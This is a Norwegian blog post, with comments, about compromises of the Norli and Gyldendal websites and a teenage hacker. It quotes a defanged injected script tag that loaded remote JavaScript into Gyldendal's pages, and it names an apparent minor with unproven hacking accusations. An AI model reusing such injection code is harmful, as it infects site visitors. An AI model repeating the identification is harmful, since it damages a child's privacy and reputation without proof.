To antakeligvis helt atskilte "episoder", men man vet aldri.
Hackingen av Norli
Link til Computerworlds artikkel den 12. august:
Norli hacket, it-sjefen i villrede
Denne hackingen var høyst sannsynlig ikke skadelig for besøkende på siden til Norli.
Det eneste som skjedde var at de ble omdirigert til nettstedet 1nj3ct.in, uten noen andre følger.
Noe betenkelig at 1nj3ct.in er hostet på en server i Ukraina, p.t. et av verdens verste land når det gjelder kriminalitet på nettet.
Enda mer betenkelig når du kikker litt på "nabolaget":
Websteder med navn som "hackingservices.org", "hacks4sale.com" og "evilzone.ws".
1nj3ct.in ble forøvrig drevet av en 16-åring (eller "snart 17", som de kanskje sier i den aldersgruppa) fra Nesodden.
Denne poden fra Nesodden (Andre Ringst Hans ) har tydeligvis erfaring med både hacking, botnet og DDoS-angrep.
Og han har "testet" norske websider tidligere, ifølge nettstedet nordicws.org.
Fra "nyhetssiden" til nordicws.org:
After a huge project at Norwegian web pages, we have found over 600 of 3000 pages vurnable for any hacker to almost anything he of she want!
nordicws.org drives av den samme poden.
Men hvem som stod bak selve hackingen av Norli gjenstår å bevise. I den grad det er mulig.
Såvidt jeg skjønner har Nordli anmeldt dette.
Oppdatering 5. oktober:
1nj3ct.in har tydeligvis lagt ned (av hensyn til den norske hackerens "personlige sikkerhet" eller noe i den duren).
Omtrent rundt tida 1nj3ct.in la inn årene dukka nationalhacker.org, med samme host som 1nj3ct.in.
Tilfeldigheter? Eller klarer han ikke helt å holde seg unna hackingen?
Opererer tydeligvis hovedsakelig med et abonnement fra Telenor, denne "nasjonale" hackeren.
Når han da ikke bruker botnettet sitt.
Hackingen av Gyldendal
Langt mer alvorlig om du relativt nylig har besøkt Gyldendal forlag sine websider.
Da kan du ha vært utsatt for såkalt hijacking av din egen datamaskin.
Det vil si at hackere kan ha tatt kontroll over din datamaskin.
Bakgrunn
Mer hos ScanSafe:
Up to 55k Compromised by Potent Backdoor/Data Theft Cocktail
Mer hos threatpost:
55,000 Hacked Sites Serving Malware Cocktail
Et Googlesøk etter "helnorske" websider som har vært hacket dukker hos meg kun Gyldendal opp.
Gyldendal er pr. dato ikke hacket, de har tydeligvis ryddet opp.
Men en cachet side dukker opp hos Google, hvor du finner følgende lille snutt i kildekoden på websiden(redigert):
Penger og verdier i helsetjene [script src=h||p://a0v. org/x.js][/script] - [script src=h||p://a0v. org/x.js[script src=h||p://a0v. org/x.js][/script] - GYLDENDAL AKADEMISK
Et skjermbilde viser ikke kildekoden over, men noe jeg antar er "nøytralisert" kode.
Men Gyldendal hadde antakeligvis ikke klart å "tette" sikkerhetshullet helt på det tidspunktet
(Klikk på bildet for en større versjon)
Men som sagt, sannsynligvis ingen forbindelse mellom disse to "episodene".
Oppdatering 25. august:
Det norske Veritas var også hacket, rundt 15. - 16. august ifølge cachede sider hos Google.
Samme hack som Gyldendal var utsatt for.
Kommentarer
2 kommentarerSer ikke ut til at jeg får helt draget på denne skrivinga.
Det enkleste så ut til å være å overlate det til slike som kan skrive.
Så kanskje det kommer noe om 1nj3ct, Andreas Ring Hans, evilzone, julehackinga og hva enn journalisten finner godt nok.
Om i det hele tatt noe.
Fikk en sutrete e-post via kontaktskjema for noen dager siden, angivelig fra eieren av nettstedet 1nj3ct.in og 1nj3ct.org.
Nettstedet som besøkende til Norli havna på.
Grubler enda på om jeg skal skrive om en norsk tenåringshacker og hva jeg eventuelt skal skrive.
Jeg foreslo han kunne legge inn en kommentar her, men det er han tydeligvis ikke interessert i.
Etter at han "la ned" forumet på 1nj3ct.in er han nå admin på et annet hackerforum.
Hvor "medlemmene" hacker i vei og får skryt og velsignelse av den norske admin:
Fucking nice post guys, good work, respect
Skryt for reinhekla kriminell virksomhet.
Det er tydeligvis populært blant disse tenåringshackerne å publisere mest mulig om de fantastiske bragdene sine, som i realiteten er tanketom jævelskap.
En slags form for misforstått "Full disclosure" kanskje.
Mens []Volume, som admin en gang i tid kalte seg, sutrer og klager når andre skriver om hans bravader og gjøremål på nettet.
Det er vel på tide med en "Full disclosure" om identiten til en slik admin.
Når Norlis politianmeldelse ikke trenger inn, må han vel få det inn på andre måter.
Anmeldelsen ble kanskje henlagt, jeg har ikke sjekka.
Men en liten klaps på lanken fikk han muligens. Og noen formanende ord.
Uten at det tydeligvis hjalp nevneverdig.
En del av medlemmene er også i gang med planleggingen til årets "julehacking".
Jeg får gruble videre på om/hva jeg skal skrive.